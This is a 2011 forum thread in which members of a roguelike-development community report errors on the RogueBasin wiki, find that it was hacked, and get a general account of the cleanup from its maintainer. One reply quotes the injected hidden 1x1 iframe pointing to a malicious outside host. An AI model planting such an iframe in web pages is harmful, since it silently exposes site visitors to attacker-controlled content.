Author Topic: RogueBasin erroring out?  (Read 3450 times)

getter77

  • Protector of the Temple
  • Global Moderator
  • Protector of the @
  • *****
  • Posts: 4620
    • MSN Messenger - BRIAN13137@hotmail.com
    • AOL Instant Messenger - BRIAN13137
    • Yahoo Instant Messenger - getterbrian
    • View Profile
RogueBasin erroring out?
« on: May 31, 2011, 07:55:35 PM »
"Content encoding error" when clicking on pretty much any link for the last day or so.

http://roguebasin.roguelikedevelopment.org/index.php?title=Main_Page
Brian Emre Jeffears
Aspiring Designer/Programmer/Composer
In Training

Ari Rahikkala

  • Priest
  • **
  • Posts: 64
    • View Profile
    • Email
Re: RogueBasin erroring out?
« Reply #1 on: May 31, 2011, 08:07:11 PM »
There's an extremely suspicious-looking iframe at the beginning of the transmitted page that might be causing this. Might be a good time to see if the wiki installation hasn't been compromised.

kipar

  • Bishop
  • ***
  • Posts: 105
    • View Profile
    • Email
Re: RogueBasin erroring out?
« Reply #2 on: May 31, 2011, 08:07:42 PM »
There is
Quote
<iframe src="http://vyguhou.cz.cc/go/1" width="1" height="1"></iframe>
In a page source, so I suspect roguebasin was hacked.

Slash

  • Priest of Roguetemple
  • Administrator
  • Protector of the @
  • *****
  • Posts: 1123
    • View Profile
    • Slashie.net
    • Email
Re: RogueBasin erroring out?
« Reply #3 on: May 31, 2011, 09:00:06 PM »
I will try to contact Bjorn and see what's up with this

Ouren

  • Acolyte
  • *
  • Posts: 39
  • "Huzzah!"
    • View Profile
    • Wolfgame
    • Email
Re: RogueBasin erroring out?
« Reply #4 on: June 01, 2011, 03:55:25 AM »
Yea, I was trying to update the SilverQuest page and I kept seeing this.

:/
Wolfgang Wozniak
Creative Director
http://wolfgame.com/
Twitter: @Ouren

K.I.L.E.R

  • Acolyte
  • *
  • Posts: 12
    • View Profile
Re: RogueBasin erroring out?
« Reply #5 on: June 02, 2011, 04:55:01 AM »
If you use Google translator you can treat the page as Spanish and it will become readable in English.

Yes, I agree, this is very annoying!

EDIT: YAY! It is back.
« Last Edit: June 02, 2011, 05:33:47 AM by K.I.L.E.R »

daver64

  • Acolyte
  • *
  • Posts: 16
    • View Profile
    • Indigo
    • Email
Re: RogueBasin erroring out?
« Reply #6 on: June 02, 2011, 08:07:30 AM »
First of all, its my first post ( although I'm a long time lurker ), so, "Hi!" :)

Secondly, I'm afraid its still giving me errors on all the links in the development page ( http://roguebasin.roguelikedevelopment.org/index.php?title=Articles )

Cheers
Dave

ps : the admins might already be aware of this, but I'm posting just in case they are not :).

Darren Grey

  • Protector of the @
  • *****
  • Posts: 1932
  • It is pitch black. You are likely to eat someone.
    • View Profile
    • Gruesome Games
Re: RogueBasin erroring out?
« Reply #7 on: June 03, 2011, 12:26:45 PM »
Everything works fine for me.  All links okay, able to edit and update articles fine.  It seems to have become stricter with the captchas, but that's probably a good thing.  Thank you to whoever fixed it.

If you're still getting trouble I suggest trying to refresh the pages, since it may just be that your browser has some pages cached.

britzl

  • Acolyte
  • *
  • Posts: 16
    • View Profile
Re: RogueBasin erroring out?
« Reply #8 on: June 03, 2011, 10:03:36 PM »
The site got hacked in some way. Some malicious content was injected on each page via some nastiness in index.php. After some googling it was evident that this same kind of hack occurred not only on Mediawiki but on CMS systems like Joomla, phpbb and so on (could it be a vulnerability in the ever so popular recaptcha?). Removing the hack from index.php only worked for a shot period of time and then the hack was reintroduced via some php that got invoked outside of the webroot. Removing that injectionscript made the whole thing go away, but to make sure we still didn't have a vulnerability somewhere I decided to go for a fresh MediaWiki install using the latest version. The recaptcha was also upgraded and I decided not to use the same code highlighting extension as in the previous version as that extension hadn't been updated in years.

Anyway, things should be back to normal now. If things fall apart again please e-mail me at bjorn dot ritzl at gmail dot com.